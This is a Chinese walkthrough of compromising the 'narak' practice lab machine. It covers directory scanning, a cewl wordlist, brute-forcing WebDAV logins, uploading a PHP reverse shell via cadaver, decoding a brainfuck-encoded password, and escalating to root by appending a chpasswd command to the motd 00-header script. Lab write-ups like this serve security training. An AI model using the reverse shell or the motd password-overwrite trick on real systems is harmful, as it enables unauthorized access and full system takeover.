narak靶机详解

narak靶机复盘

首先对靶机进行扫描,找到靶机的真实ip地址。

然后dirb进行目录扫描,扫描到一个目录,我们打开发现是一个登陆界面。

narak靶机详解_第1张图片

narak靶机详解_第2张图片

并没有用户名和密码,我们就用cewl扫描这个网站,扫出一个字典,用来暴力破解。

cewl http://192.168.197.170 -w passwd1.txt

image-20230628202905535

经过暴力破解发现了一个用户名和密码

login: yamdoot password: Swarg

成功登陆webdav这个页面,在网上搜索了一下webdav,发现是一个客户端,发现有专门针对这个客户端上传文件的工具,所以我们就利用cadaver上传一个php木马文件。

Cadaver 是一个命令行 WebDAV 客户端工具,可以用来管理 WebDAV 服务器上的文件和目录。

创建一个shell.php在当前目录下,然后使用cadaver登陆webdav,使用put shell.php命令就能把我们的木马上传。

 $sock, 
	1 => $sock, 
	2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

narak靶机详解_第3张图片

原本登陆后是没有shell.php,现在我们上传后执行一个反弹shell,用kali来监听就可以返回一个命令行。

narak靶机详解_第4张图片

narak靶机详解_第5张图片

用python3美化一下命令行。

image-20230628205129325

经过寻找发现在/mnt目录下有一个hell.sh文件,打开后发现有一串brainfuck加密文本,经过解密发现明文是chitragupt

narak靶机详解_第6张图片

narak靶机详解_第7张图片

发现home下面有三个用户,就尝试用这个密码来登陆一下,发现刚好是inferno用户的密码,因为原本是web shell权限很低,现在拿到了真正的shell。

narak靶机详解_第8张图片

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

#命令解释:
从根目录下开始查找 文件类型 属主是root 普通用户或组可执行 其他用户可写  如果发现了符合条件的用 ls -l命令显示  错误信息从定向到null

narak靶机详解_第9张图片

motd是负责ssh登录后,页面欢迎语 提示语的,用户可以通过配置文件自定义欢迎提示信息。具体配置文件理论上这个目录下的任意文件都可以。通常修改00-header文件即可。

/etc/update-motd.d/00-header

echo “echo ‘root:admin’|sudo chpasswd”>>/etc/update-motd.d/00-header

narak靶机详解_第10张图片

narak靶机详解_第11张图片

虽说理论上修改这个文件夹的所有文件都可以,但是经过尝试了一个别的文件,并不能成功修改root密码,只有00-header在ssh连接时候会执行成功。

narak靶机详解_第12张图片

你可能感兴趣的:(打靶机系列,linux,web安全,网络安全)